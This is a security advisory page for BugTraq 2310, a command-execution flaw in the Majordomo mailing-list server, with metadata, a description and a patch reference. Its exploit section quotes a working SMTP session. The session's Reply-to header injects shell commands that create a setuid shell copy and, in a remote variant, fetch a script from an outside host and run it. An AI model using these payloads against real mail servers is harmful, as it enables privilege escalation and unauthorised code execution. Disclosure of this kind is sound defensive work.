Majordomo lists Command Execution Vulnerability
BID:2310
Info
Majordomo lists Command Execution Vulnerability
| Bugtraq ID: | 2310 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Jun 01 1994 12:00AM |
| Updated: | Jun 01 1994 12:00AM |
| Credit: | Posted to BugTraq on Razvan Dragomirescu < [email protected] > on August 24, 1997. |
| Vulnerable: |
Great Circle Associates Majordomo 1.90 Great Circle Associates Majordomo 1.89 |
| Not Vulnerable: |
Great Circle Associates Majordomo 1.94.5 Great Circle Associates Majordomo 1.94.4 Great Circle Associates Majordomo 1.91 |
Discussion
Majordomo lists Command Execution Vulnerability
Majordomo is a perl-based Internet e-mail list server. Versions prior to 1.91 are vulnerable to an attack whereby specially crafted e-mail headers are incorrectly processed, yielding the ability to execute arbitrary commands with the privileges of Majordomo. This is possible only when "advertise" or "noadvertise" directives are specified in the configuration files.
Majordomo is a perl-based Internet e-mail list server. Versions prior to 1.91 are vulnerable to an attack whereby specially crafted e-mail headers are incorrectly processed, yielding the ability to execute arbitrary commands with the privileges of Majordomo. This is possible only when "advertise" or "noadvertise" directives are specified in the configuration files.
Exploit / POC
Majordomo lists Command Execution Vulnerability
The following exploits are quoted directly from Razvan Dragomirescu's BugTraq message (see credit):
Local exploit:
--exploit--
telnet localhost 25
helo localhost
mail from: user
rcpt to: majordomo (or whatever the name of the majordomo user is)
data
From: user
To: majordomo
Reply-to: a~.`/bin/cp\${IFS}/bin/bash\${IFS}/tmp/lord&&/bin/chmod\${IFS}4777\${IFS}/tmp/lord`.q~a/ad=cucu/c=blu\\\@kappa.ro
LISTS
.
quit
--end of exploit --
For the remote users, change the Reply-to field to something like:
Reply-to: a~.`/usr/bin/rcp\${IFS}[email protected]:script\${IFS}/tmp/script&&source\${IFS}/tmp/script`.q~a/ad=cucu/c=blu\\\@kappa.ro
The following exploits are quoted directly from Razvan Dragomirescu's BugTraq message (see credit):
Local exploit:
--exploit--
telnet localhost 25
helo localhost
mail from: user
rcpt to: majordomo (or whatever the name of the majordomo user is)
data
From: user
To: majordomo
Reply-to: a~.`/bin/cp\${IFS}/bin/bash\${IFS}/tmp/lord&&/bin/chmod\${IFS}4777\${IFS}/tmp/lord`.q~a/ad=cucu/c=blu\\\@kappa.ro
LISTS
.
quit
--end of exploit --
For the remote users, change the Reply-to field to something like:
Reply-to: a~.`/usr/bin/rcp\${IFS}[email protected]:script\${IFS}/tmp/script&&source\${IFS}/tmp/script`.q~a/ad=cucu/c=blu\\\@kappa.ro
Solution / Fix
Majordomo lists Command Execution Vulnerability
Solution:
Upgrade to the latest version of majordomo (fixed in 1.91). If this is difficult, a patch for version 1.90 and a workaround for other versions are available.
Great Circle Associates Majordomo 1.90
Solution:
Upgrade to the latest version of majordomo (fixed in 1.91). If this is difficult, a patch for version 1.90 and a workaround for other versions are available.
Great Circle Associates Majordomo 1.90
-
Great Circle Associates majordomo1.90.patch
http://www.securityfocus.com/data/vulnerabilities/patches/majordomo1.9 0.patch
References
Majordomo lists Command Execution Vulnerability
References:
References:
- Majordomo Homepage (Great Circle Associates)
- REVISED: Majordomo SECURITY patch and fix (offical version) (John P. Rouillard < [email protected] >)